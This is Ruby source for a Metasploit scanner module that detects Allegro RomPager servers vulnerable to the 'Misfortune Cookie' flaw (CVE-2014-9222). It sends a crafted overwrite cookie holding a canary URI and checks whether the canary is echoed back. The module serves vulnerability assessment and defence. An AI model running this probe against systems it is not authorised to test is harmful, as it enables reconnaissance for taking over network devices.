## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize(info = {}) super(update_info( info, 'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Scanner", 'Description' => %q( This module scans for HTTP servers that appear to be vulnerable to the 'Misfortune Cookie' vulnerability which affects Allegro Software Rompager versions before 4.34 and can allow attackers to authenticate to the HTTP service as an administrator without providing valid credentials. ), 'Author' => [ 'Jon Hart ', # metasploit module 'Lior Oppenheim' # CVE-2014-9222 ], 'References' => [ ['CVE', '2014-9222'], ['URL', 'http://mis.fortunecook.ie'], ['URL', 'http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices ['URL', 'http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC ], 'DisclosureDate' => '2014-12-17', 'License' => MSF_LICENSE )) register_options( [ OptString.new('TARGETURI', [true, 'URI to test', '/']) ], Exploit::Remote::HttpClient ) register_advanced_options( [ OptString.new('CANARY_URI', [false, 'Try overwriting the requested URI with this canary value (empty for random)']), OptString.new('STATUS_CODES_REGEX', [true, 'Ensure that canary pages and probe responses have status codes that match this regex', '^40[134]$']) ], self.class ) end def check_host(_ip) begin test_misfortune ensure disconnect end end def run_host(ip) status = check_host(ip) case status when Exploit::CheckCode::Appears when Exploit::CheckCode::Detected when Exploit::CheckCode::Vulnerable print_good("#{peer} #{status.last}") else vprint_status("#{peer} #{status.last}") end end def setup @status_codes_regex = Regexp.new(datastore['STATUS_CODES_REGEX']) end # Fingerprints the provided HTTP response and returns # Exploit::CheckCode::Appears if it is a vulnerable version of RomPager, # otherwise returns the provided fall-back status. def check_response_fingerprint(res, fallback_status) fp = http_fingerprint(response: res) if /RomPager\/(?[\d\.]+)/ =~ fp vprint_status("#{peer} is RomPager #{version}") if Rex::Version.new(version) < Rex::Version.new('4.34') return Exploit::CheckCode::Appears end end fallback_status end def find_canary vprint_status("#{peer} locating suitable canary URI") canaries = [] if datastore['CANARY_URI'] canaries << datastore['CANARY_URI'] else # several random URIs in the hopes that one, generally the first, will be usable 0.upto(4) { canaries << '/' + Rex::Text.rand_text_alpha(16) } end canaries.each do |canary| res = send_request_raw( 'uri' => normalize_uri(canary), 'method' => 'GET', 'headers' => headers ) # in most cases, the canary URI will not exist and will return a 404, but # if everything under TARGETURI is protected by auth, a 401 may be OK too. # but, regardless, respect the configuration set for this module return [canary, res.code] if res && res.code.to_s =~ @status_codes_regex end nil end def headers { 'Referer' => full_uri } end # To test for this vulnerability, we must first find a URI known to return # a 404 (not found) which we will use as a canary. This URI (for example, # /foo) is then taken and used as the value for a carefully crafted cookie # when making a request to the configured host+port+uri. If the response # is a 404 and the body includes the canary, it is likely that the cookie # overwrote RomPager's concept of the requested URI, indicating that it is # vulnerable. def test_misfortune # find a usable canary URI (one that returns an acceptable status code already) if canary = find_canary canary_value, canary_code = canary vprint_status("#{peer} found canary URI #{canary_value} with code #{canary_code}") else vprint_error("#{peer} Unable to find a suitable canary URI") return Exploit::CheckCode::Unknown end canary_cookie_name = 'C107373883' canary_cookie = canary_cookie_name + "=#{canary_value};" # Make a request containing a specific canary cookie name with the value set # from the suitable canary value found above. res = send_request_raw( 'uri' => normalize_uri(target_uri.path.to_s), 'method' => 'GET', 'headers' => headers.merge('Cookie' => canary_cookie) ) unless res vprint_error("#{full_uri} no response") return Exploit::CheckCode::Unknown end unless res.code.to_s =~ @status_codes_regex vprint_status("#{full_uri} unexpected HTTP code #{res.code} response") return check_response_fingerprint(res, Exploit::CheckCode::Detected) end unless res.body vprint_status("#{full_uri} HTTP code #{res.code} had no body") return check_response_fingerprint(res, Exploit::CheckCode::Detected) end # If that canary *value* shows up in the *body*, then there are two possibilities: # # 1) If the canary cookie *name* is also in the *body*, it is likely that # the endpoint is puppeting back our request to some extent and therefore # it is expected that the canary cookie *value* would also be there. # return Exploit::CheckCode::Detected # # 2) If the canary cookie *name* is *not* in the *body*, return # Exploit::CheckCode::Vulnerable if res.body.include?(canary_value) if res.body.include?(canary_cookie_name) vprint_status("#{full_uri} HTTP code #{res.code} response contained canary cookie name #{canary_cookie_name}") return check_response_fingerprint(res, Exploit::CheckCode::Detected) else vprint_good("#{full_uri} HTTP code #{res.code} response contained canary cookie value #{canary_value} as URI") report_vuln( host: rhost, port: rport, name: name, refs: references ) return Exploit::CheckCode::Vulnerable end end vprint_status("#{full_uri} HTTP code #{res.code} response did not contain canary cookie value #{canary_value} as URI") check_response_fingerprint(res, Exploit::CheckCode::Safe) end end